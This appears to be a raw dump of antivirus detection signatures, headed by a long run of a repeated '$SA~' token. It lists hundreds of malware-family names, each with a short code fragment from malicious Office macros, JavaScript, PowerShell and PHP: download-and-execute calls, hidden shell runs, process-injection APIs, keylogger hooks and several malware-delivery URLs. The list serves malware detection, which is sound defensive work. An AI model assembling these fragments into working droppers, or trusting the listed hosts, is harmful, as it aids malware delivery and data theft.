$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~$SA~ Del /F /Q !#MHSTR:MacroJustmakecab /c makecab !#MHSTR:MacroJustwinmgmts winmgmts: \twinmgmts: !#MHSTR:MacroLaroux2 .OnKey \"%{F8}\" !#MHSTR:MsInkAutolib As MSINKAUTLib !#MHSTR:Obfuscator.EmptyAssign !#MHSTR:RtlMoveMemory !#MHSTR:XL4:Expert:Feature:14 !#MHSTR:uripdll \\urip.d\" & \"l\" & \"l !#MHSTR:Calluuu !#MHSTR:DonoffEncodedHTTP = \";oosCRR !#MHSTR:GetTempPath.A = GetTempPath( !#MHSTR:IInkRectangle .IInkRectangle !#MHSTR:MacroJustRandomize Randomize !#MHSTR:MacroJustWriteFile !#MHSTR:MacroLaroux3 .OnKey \"%{F11}\" !#MHSTR:MacroOrNotVariations Or (Not !#MHSTR:PathSeparator .PathSeparator !#MHSTR:URLDwndlF !#MHSTR:WshShell.Run.A WshShell.Run( !#MHSTR:XL4:Expert:Feature:3 !#MHSTR:XL4:Expert:Feature:35 !#MHSTR:XL4:Expert:Feature:36 !#MHSTR:XL4:Expert:Feature:37 !#MHSTR:XL4:Expert:Feature:38 !#MHSTR:XL4:Expert:Feature:39 !#MHSTR:XL4:Expert:Feature:4 !#MHSTR:XL4:Expert:Feature:40 !#MHSTR:XL4:Expert:Feature:41 !#MHSTR:XL4:Expert:Feature:42 !#MHSTR:XL4:Expert:Feature:43 !#MHSTR:XL4:Expert:Feature:44 !#MHSTR:XL4:Expert:Feature:45 !#MHSTR:XL4:Expert:Feature:46 !#MHSTR:XL4:Expert:Feature:47 !#MHSTR:XL4:Expert:Feature:48 !#MHSTR:XL4:Expert:Feature:49 !#MHSTR:XL4:Expert:Feature:54 !#MHSTR:XL4:Expert:Feature:55 !#MHSTR:XL4:Expert:Feature:56 !#MHSTR:XL4:Expert:Feature:57 !#MHSTR:XL4:Expert:Feature:58 !#MHSTR:XL4:Expert:Feature:59 !#MHSTR:XL4:Expert:Feature:60 !#MHSTR:XL4:Expert:Feature:61 !#MHSTR:XL4:Expert:Feature:62 !#MHSTR:XL4:Expert:Feature:63 !#MHSTR:XL4:Expert:Feature:7 !#MHSTR:MacroJustMid Mid( Mid$( !#MHSTR:CallWindowProc !#MHSTR:Ferusdll \\ferus.d\" & \"l\" & \"l !#MHSTR:LibAlias Lib \"kernel32\" Alias !#MHSTR:MacroJustGetObject !#MHSTR:MacroStartupPath .StartupPath !#MHSTR:MacroUsesWordBasic WordBasic. !#MHSTR:MacroWin32Check If Win32 Then !#MHSTR:Obfuscator.EmptyAssign.A !#MHSTR:VirtualAllocEx !#MHSTR:XL4:Expert:Feature:17 !#MHSTR:ErrNumber Err.Raise Number:=1, !#MHSTR:HasSplitString !#MHSTR:MacroCJustEntireRow .EntireRow !#MHSTR:MacroCJustIsNumeric IsNumeric( !#MHSTR:MacroJustChrXor !#MHSTR:MacroJustOUTLOOK \"OUTLOOK.EXE\" !#MHSTR:MacroJustStrReverse !#MHSTR:MacroJustWallpaper \"Wallpaper\" !#MHSTR:RecentFiles .RecentFiles.Count !#MHSTR:DownloadToFileA DownloadToFileA !#MHSTR:MacroCJustvbCritical vbCritical !#MHSTR:MacroJustFileExists .FileExists !#MHSTR:MacroJustSavetoFile !#MHSTR:MacroJustShowWindow .ShowWindow !#MHSTR:MacroJustWordPress !#MHSTR:MacroLaroux4 .SendKeys \"%{F11}\" !#MHSTR:MacroUsesCallByName CallByName( !#MHSTR:MacroresumeThread resumethread !#MHSTR:Phtl c:\\Users\\Public\\ !#HSTR:MacroCheckBuild Application.Build @aristocrat.com !#MHSTR:MACRO/Obfuscator.strtmp.A & \"tmp !#MHSTR:MacroCJustVBProjects .VBProjects !#MHSTR:MacroFileCopyJoin filecopy join( !#MHSTR:MacroJustCloseHandle !#MHSTR:MacroJustCreateFileA !#MHSTR:MacroJustGetFileSize !#MHSTR:Prgmdta !#MHSTR:ThenForNext !#MHSTR:PutBinary (\"&H\" CByte !#MHSTR:Caret.Split Hour(Now), Hour(Now), !#MHSTR:EnumTimeFormatsW !#MHSTR:GetPriorityClass GetPriorityClass !#MHSTR:MacroJustDOMDocument .DOMDocument !#MHSTR:MacroJustWin64Check If Win64 Then !#MHSTR:MacroShellvbHide vbhide !#MHSTR:XL4:Expert:Feature:5 !#MHSTR:XL4:Expert:Feature:6 !#MHSTR:BLOB:O97M/Donoff \"bank\" \"l.ru\" !#ALF:MHSTR:ReplaceText.1 \", \"RRDD\", \"om\") !#MHSTR:Instr InStr(\" !#MHSTR:MacroCJustVB_ProcData .VB_ProcData !#MHSTR:MacroJustGetCursorPos !#MHSTR:MacroJustPasteBin pastebin.com/raw !#MHSTR:MacroJustRegOpenKeyEx !#MHSTR:O97M/RepeatCBool.A * CBool( !#MHSTR:PSEncodedCommand !#MHSTR:Regsvr C:\\Windows\\system32\\reg.exe !#MHSTR:ThisDocumentPath ThisDocument.Path !#HSTR:MacroBookmarksCount .Bookmarks.Count !#MHSTR:BigDim Dim ) As Long, !#MHSTR:DllRegisterServer !#MHSTR:FinReplace Replace( , \",\", \"/\") !#MHSTR:MacroJustADODBStream \"ADODB.Stream\" !#MHSTR:MacroJustCreateObject !#MHSTR:MacroJustLongWhiteSpace \" !#MHSTR:MacroJustResponseBody .responsebody !#MHSTR:MacroJustStrmq .StoryRanges.Item(1) !#MHSTR:MacroJustWScriptShell WScript.Shell !#MHSTR:Obfuscator.B64.Wscript (\"V3Njcmlw\") !#MHSTR:Obfuscator.Split.Http \"htt\" + \"p:// !#MHSTR:ShellInEquation Shell( !#MHSTR:TrimThisDocument Trim(ThisDocument. !#MHSTR:MacroBigArraying (100) = (101) = !#MHSTR:MacroCJustLastDllError .LastDllError !#MHSTR:MacroJustRegSetValueEx !#MHSTR:MacroJustShellExecuteA !#MHSTR:MacroJustgmtq !#MHSTR:MacroMemoryManipulation !#MHSTR:Oernxtm !#MHSTR:XL4:Expert:Feature:15 !#MHSTR:ShellApi Shell$ !#MHSTR:AscMinusAsc \") - Asc(\" !#MHSTR:CallShell Call Shell( ), 0) !#MHSTR:CreateDirectoryExA CreateDirectoryExA !#MHSTR:EnumResourceTypesW !#MHSTR:MacroDynamicApiResolve getprocaddress !#MHSTR:MacroJustNewWScriptShell New WshShell !#MHSTR:MacroSubExecute Private Sub Execute() !#MHSTR:WriteProcessMemory !#MHSTR:MacroBase64Exe = \"TVqQAA = \"TVoAAA !#MHSTR:MacroJustEnviron Environ$ !#MHSTR:APPolo = Application.Run(\"nm\", ololow) !#MHSTR:ForNextDime Exit For Next Dim !#MHSTR:MacroCountMacros WordBasic.CountMacros !#MHSTR:MacroJustCreateProcess !#MHSTR:MacroJustOnErrorResume On Error Resume !#MHSTR:MacroJustRegCreateKeyEx !#MHSTR:MacroJustSetFilePointer !#MHSTR:MacroJustingmq !#MHSTR:MacroJustroceq !#MHSTR:MacroJustvbextpplocked vbext_pp_locked !#MHSTR:OddURLExe.A //gets-adobe.com `.exe\" !#MHSTR:Pshexec ) = 262 Then Shell !#MHSTR:Splitspace !#MHSTR:VBExposed Attribute VB_Exposed = False !#MHSTR:softoff HKCU\\Software\\Microsoft\\Office !#SLFPER:O97M/Nibtse !#MHSTR:MACRO/filenameext.exe.A !#MHSTR:XL4:Expert:Feature:51 !#MHSTR:SetSizeToZero .XSize = 0 .YSize = 0 !#HSTR:MacroCheckPermissions Permission.Enabled !#HSTR:MacroCheckRunningTasks Application.Tasks !#MHSTR:Brocess !#MHSTR:ERplcdotp !#MHSTR:MacroBATDelVariations \"del \" + Chr(34)\" !#MHSTR:MacroJustExcelSecurity \\Excel\\Security\\ !#MHSTR:MacroJustSpecialFolders .SpecialFolders !#MHSTR:MacroJustvbHide 0False !#MHSTR:MacroSubOpen1Line Open(): : End Sub !#MHSTR:Net.Use vbNullString, \"net\", \"use * \" & !#MHSTR:O97M/Hancitor.RH.EML!MTB & \"\\W0rd.dll\") !#MHSTR:O97M/Powdow.H + \"ps://formaversa.co/trq !#MHSTR:Obfuscator.CharUsed.D = (\"^ !#MHSTR:Obfuscator.LongNames.A !#MHSTR:Obfuscator.LongNames.B !#MHSTR:PSWindowStyleHidden -WindowStyle hidden !#TEL:Trojan:O97M/Obfuse.CT = \"dvfert36tge4tgf\" !#MHSTR:MacroCJustNormalTemplate .NormalTemplate !#MHSTR:MacroCJustVB_Description .VB_Description !#MHSTR:MacroCloseCallShell _cloSE(): Call Shell !#MHSTR:Obfuscator.Split.AppData + \"ppd\" + \"ata\" !#MHSTR:RegisterCimProvider register-cimprovider !#MHSTR:SuspiciousRoundWithString Round(\" !#MHSTR:Urlhtdow http://clarityupstate.com/b.ocx !#MHSTR:XL4:Expert:Feature:12 !#MHSTR:rocdot !#MHSTR:MacroJustConcatVariations \" & \" !#MHSTR:EncDoc.QHLL!MTB .xyz/index udSDFUsnks !#MHSTR:MacroExecute !#HSTR:MacroCheckDocumentKind ActiveDocument.Kind !#MHSTR:MacroJustADODBConnection ADODB.Connection !#MHSTR:MacroJustDocumentOpen Sub Document_Open() !#MHSTR:MacroJustSpecialFolder .GetSpecialFolder( !#MHSTR:MacroJustWorkbookOpen !#MHSTR:NtWriteVirtualMemory !#MHSTR:Obfuscator.WMI.A \".\\r\" \tOot\\Ci\") & !#MHSTR:URLDownloadToFileA.A = URLDownloadToFile( !#MHSTR:VBA.Shell.End VBA.Shell$ !#MHSTR:ZwWriteVirtualMemory !#MHSTR:MacroJustB64Mark ==\" !#MHSTR:Steptwwo Call stetptwwo Call tsettpwwo !#MHSTR:UserFormInfo .Caption .Scroll !#MHSTR:MacroDownload urlmon !#TEL:TrojanDownloader:O97M/BITSAbuse.A \tbitsadmin !#MHSTR:Comments.Odd.A As LongPtr) ' !#MHSTR:MacroCJustOperatingSystem .OperatingSystem !#MHSTR:MacroExecuteHide.A Shell LocalFile, vbHide !#MHSTR:MacroJustActiveDocPath ActiveDocument.Path !#MHSTR:MacroJustInternetOpenUrlA !#MHSTR:MacroJustInternetReadFile !#MHSTR:MacroNormalPrompt Options.SaveNormalPrompt !#MHSTR:NextEndFunction Next !#SLF:O97M/LoadAmsi (\"amsi.dll\" \"Amsi !#MHSTR:MacroNextLineTrick _ _ & !#TEL:TrojanDownloader:O97M/MsiexecAbuse.A msiexec !#MHSTR:CreateTimerQueueTimer !#MHSTR:Donoff.Replace.3 (Replace(Replace(Replace !#MHSTR:ForVariableInstance !#MHSTR:MACRO/Process.TMP.A Start-Process %TMP% !#MHSTR:MacroBig0D0A !#MHSTR:MacroJustChrWq + wdKeyS + \\durio.fur1 !#MHSTR:O97M/InteractionNewLine Interaction _ !#MHSTR:Obfuscator.Win32Check \tN32_\") & !#MHSTR:PrintCellValue Print # , Cells( !#MHSTR:WscriptAndShell \", \"\", \"WScript\" & \".Shell\" !#TELPER:OneLineAutoOpen !#MHSTR:MacroJustOneShell_Gen !#MHSTR:NtAllocateVirtualMemory !#MHSTR:Setyrg \\Excel\\Security c:\\users\\public\\1.reg !#MHSTR:WriteFile \" For Output As 0Print !#ALF:MHSTR:MacroDocxAsRtf Attribute VB_ !#MHSTR:ImportUrlApi !#MHSTR:MacroCloseSkewed Auto_Close() autoclose() !#HSTR:MacroCallByNameTag CallByName .Tag, !#MHSTR:MACRO/Obfuscator.Split.C \"W\" & \"or\" !#MHSTR:MacroCreateolmailitem .CreateItem(olMailItem) !#MHSTR:MacroJustUserFormActivate UserForm_Activate() !#MHSTR:SubJop Sub jop(uuu As String, aaaa As String) !#MHSTR:WriteJS .js\" For Output As !#MHSTR:O97M/EncDoc.RR!MTB /.jpg IICCII !#HSTR:MacroCheckCountryInfo Application.International !#MHSTR:MacroCJustWorksheetFunction .WorksheetFunction !#MHSTR:MacroDisplayAlertsFalse .DisplayAlerts = False !#MHSTR:MacroJustExecuteExcel4Macro ExecuteExcel4Macro !#MHSTR:MacroJustURLDownloadToFileA !#MHSTR:MacroReplaceObfus Replace(\" X\", \"--$-\", \"\") !#MHSTR:O97M/Qakbot.PSY!MTB C:\\ProgramData\\Freyrgb.dll !#MHSTR:O97M/RepeatSelectCase.A Select Case !#MHSTR:Powdow!VbaShell - 1) !#HSTR:MacroSensitiveDocLen = Len(ThisDocument.Content) !#HSTR:TinyDocumentOpen sub document_open() end sub !#MHSTR:MacroCJustBitmapMissingFonts BitmapMissingFonts !#MHSTR:MacroJustBinaryAccessWrite Binary Access Write !#MHSTR:WriteExe .exe\" For Output As !#MHSTR:WritePS1 .ps1\" For Output As !#MHSTR:WriteVBS .vbs\" For Output As !#MHSTR:ZwAllocateVirtualMemory ZwAllocateVirtualMemory !#MHSTR:DorpDocC2.A https://tegavu.com becomindo.com !#MHSTR:Exmac KillArray ZipFolder !#HSTR:TrojanDownloader:W97M/Adnel.E Sub pppppppppppdf() !#MHSTR:ActiveDocument.Sections ActiveDocument.Sections( !#MHSTR:Bwinmgtsplus !#MHSTR:ConcatUserFormInfo form.Label1.Caption + !#MHSTR:JoinLDIM + Join( !#MHSTR:MACRO/Obfuscator.Redundancy.EmptyIf Then !#MHSTR:MACRO/Obfuscator.Split.B \" & \".r t\" & \" !#MHSTR:Macro.Base64Const Public Const = \"BASE64\" !#MHSTR:MacroJustScriptingFSO !#MHSTR:RunWithJoin .Run Join( A-Za-z), !#MHSTR:Windo done(\"ja\"+\"va\",make !#SCPT:CodeOnly.Venusie.C functionfind_wasmj http://b.reich.io/ !#SCPT:JS/Nemucod.SG.0001 newerror(4);varnum !#SCPT:JS/Nemucod.SG:0002 \";if(d==0){try{var !#SCPT:JS/Obfuse.RSF1!MTB |5000|settimeouts| !#SCPT:JS/Phish.ZXXY2!MTB <divclass=\"files\"> !#SCPT:JS/Prototype.Array array[\"prototype\"] !#SCPT:PDF:Stayt_B57EC8F3 ://fliaced.ru)>>>> \\g\\prfb-chrome.exe !#SCPT:TisifiException222 iesoexpensereports !#SCPT:Tobeet_Js_0880D6AF .value;return;}if( !#SCPT:Tobeet_Js_398DF7F8 vara={a:\"(function !#SCPT:Tobeet_Js_4467F3FE 41,59,10,125));/*! !#SCPT:Tobeet_Js_4FBDF365 '),{'\\x64\\x65\\x74\\ !#SCPT:Tobeet_Js_5F9A8505 replace(reg.eep,\"a !#SCPT:Tobeet_Js_66FE67AD ,41,59,10,125));/* !#SCPT:Tobeet_Js_7F8A15D1 ,47,122,114,116,46 !#SCPT:Tobeet_Js_8154A2CC ,59,10,125));/***@ !#SCPT:Tobeet_Js_86912E10 32,49,48,48,44,32, !#SCPT:Tobeet_Js_913390EB %x}2c9n*q+\";return !#SCPT:Tobeet_Js_97288EC7 \\\",\\\"\\\"),dot=0,hf= !#SCPT:Tobeet_Js_A37D1202 (e<32?95+e:e)}try{ !#SCPT:Tobeet_Js_A785A31D fi,ri,fr,wi,s2,ctf !#SCPT:Tobeet_Js_B9AB3F9F dot=0,hf=function( !#SCPT:Tobeet_Js_C97E26B6 elds\"][\"a\"+\"pp\"+\"e !#SCPT:Tobeet_Js_D19497FA xmlhttp;if(window. !#SCPT:Tobeet_Js_DAB084D3 b\\',\\'g\\'),k[c])}} !#SCPT:VBS/Installer.AJK3 filename=randomexe invoke-backdoorlnk invoke-jsratregsvr invoke-jsratrundll invoke-poshrathttp !#SCRIPT:PHP/SocketRead.A socket_read( !#SCRIPT:Perl/Massdefa.A2 (c)odedbyh4ckinger !#Trojan:Win32/Lnkcmd.HZ3 !#BAT:BitsadminCmd!AddFile bitsadmin/addfile !#Exploit:O97M/SlExK.frag3 c;x1;y102;ehalt() !#SCPT:CodeOnly.Dropclay.E newarrayfengshui( !#SCPT:CodeOnly.Veeblier.A tiny_dd_magic_arg !#SCPT:Exploit:JS/Axpergle uctnczih(\"tij-#2n !#SCPT:Exploit:RTF:BLDER.5 fcamefromimgdummy !#SCPT:HTML/Phish.PDH6!MTB newinjection///// !#SCPT:JS/Obfuse.ZXXP1!MTB array(wsh[drag0mf !#SCPT:O97M/EncDoc.RA4!MTB ></xm:macrosheet> !#SCPT:Obfuscator.BigSleep sleep !#SCPT:VBSNetlogonDrivemap netlogon\\drivemap !#SCPT:VBSOpenAsTextStream .openastextstream &chr( !#SCPT:getextensionname.A1 getextensionname( !#SCRIPT:CreateProcessFunc createprocessfunc !#SCRIPT:DllRegisterServer !#SCRIPT:HasObj_document.C .body.clientwidth {++(d.body)}catch !#SCRIPT:JS/Nemucod.OOE.01 (\"g\\x45t\",\"http:\" !#SCRIPT:NetDiscoenumnet.A enumnetworkdrives !#SCRIPT:PHP/Oogway.E1!MTB codedbykashifkhan !#SCRIPT:PS/PowerHub.C!MTB &(g`cmi*k`e-e*n)$ !#SCRIPT:PsGetModuleFile.A getmodulefilename !#Trojan:BAT/Agent.MR6!MTB strreverse(\"teg\") !#XmlSerialGadgetWindowsId <windowsidentity !#Adware:PowerShell/AdLoad1 c:\\windows\\psgo\\ !#SCPT:AADprovisioningapi.C get-globaladmins !#SCPT:CodeOnly.Flyheart.AG classmjfetch !#SCPT:CodeOnly.Sundoggle.N frameworkplugin( !#SCPT:CodeOnly.Sundoggle.R classbtledevice( !#SCPT:CodeOnly.Sundoggle.T classandroidble( !#SCPT:FolderPathUserPublic c:\\users\\public\\ !#SCPT:GeneralityCleanStr.H ps3systembrowser !#SCPT:GeneralityCleanStr.N alloc8_constants !#SCPT:Nemucod:StartProcess ='^;start-proces !#SCPT:O97M/Dridex.VIS6!MTB <t>m/ds/0604.</t !#SCPT:O97M/EncDoc.RHA5!MTB !#SCPT:O97M/EncDoc.RSS1!MTB >microsoftexcel< !#SCPT:O97M/EncDoc.VPP4!MTB <f>\"wnloadt\"</f> !#SCPT:O97M/IcedID.VAR2!MTB !#SCPT:O97M/IcedID.VI93!MTB belandes(0,cc268 !#SCPT:O97M/Qakbot.RVG2!MTB !#SCPT:O97M/Qakbot.RVI2!MTB !#SCPT:PWS:HTML/Phish.SMKV6 //newinjection// !#SCPT:Win32/XFAObfuscation /acroform<</xfa% !#SCPT:WindowsDiscount_ins3 installfdservice !#SCRIPT:FlashExp_shellcode eb125831c966b96d !#SCRIPT:GetAsyncKeyState.A getasynckeystate !#SCRIPT:GetKeyboardState.A getkeyboardstate !#SCRIPT:HTML/TechMsgCall.B contactemergency !#SCRIPT:HTML/TechMsgCall.E contactmicrosoft !#SCRIPT:HTML/TechMsgCall.H microsoftsupport }catch(gdsgdsg){ }catch(gdsgsdg){ za+=string[ff](e yy/=36}catch(pq) !#SCRIPT:JS/TechAlertCode.M onclick=\"alert(' !#SCRIPT:PHP/Xboxeye.A2!MTB include'ip.php'; !#SCRIPT:PsEnvUserProfile.A $env:userprofile !#TEL:HTML/CoinHive.C!Miner .start(); !#TEL:HTML/CoinHive.F!Miner newcoinhive.user !#Trojan:VBS/Autorun!attr06 executestatement !#Trojan:Win32/Pony.SA6!MTB ping-n2127.0.0.1 !#Exploit:Win32/Pdfjsc.ZX_02 qq='trewqva!l'; !#PowerShell:ConvertFrom-Csv convertfrom-csv !#PowerShell:Enter-PSSession enter-pssession !#PowerShell:Get-PSCallStack get-pscallstack !#PowerShell:Get-TraceSource get-tracesource !#PowerShell:Measure-Command measure-command !#PowerShell:Remove-PSSnapin remove-pssnapin !#PowerShell:Remove-TypeData remove-typedata !#PowerShell:Remove-Variable remove-variable !#PowerShell:Set-TraceSource set-tracesource !#PowerShell:Update-TypeData update-typedata !#SCPT:Exploit:JS/Axpergle.A exteeec\"value=\" !#SCPT:Exploit:JS/Meadgive.A m3s4v\" @\".mp3\" !#SCPT:HTML/Phish.VIS992!MTB ///newinjection !#SCPT:KeyloggerWindowHook.A wh_keyboard_ll, !#SCPT:LowfiTrojan:JS/Auto23 \\open\\default=1 !#SCPT:LowfiTrojan:JS/Auto84 .pl/rc/\"framebo !#SCPT:O97M/EncDoc.VARP4!MTB now()&\".dat ${\"\\x47\\x4c\\x4f !#SCPT:Powershell/Leivion.P4 ::virtualalloc( !#SCPT:Trojan:IS/AutoRun.KD7 viewfilesondisk !#SCPT:Trojan:JS/Iframe.JRL2 window['alert'] ev'+fnk+\"a\"+\"l\" 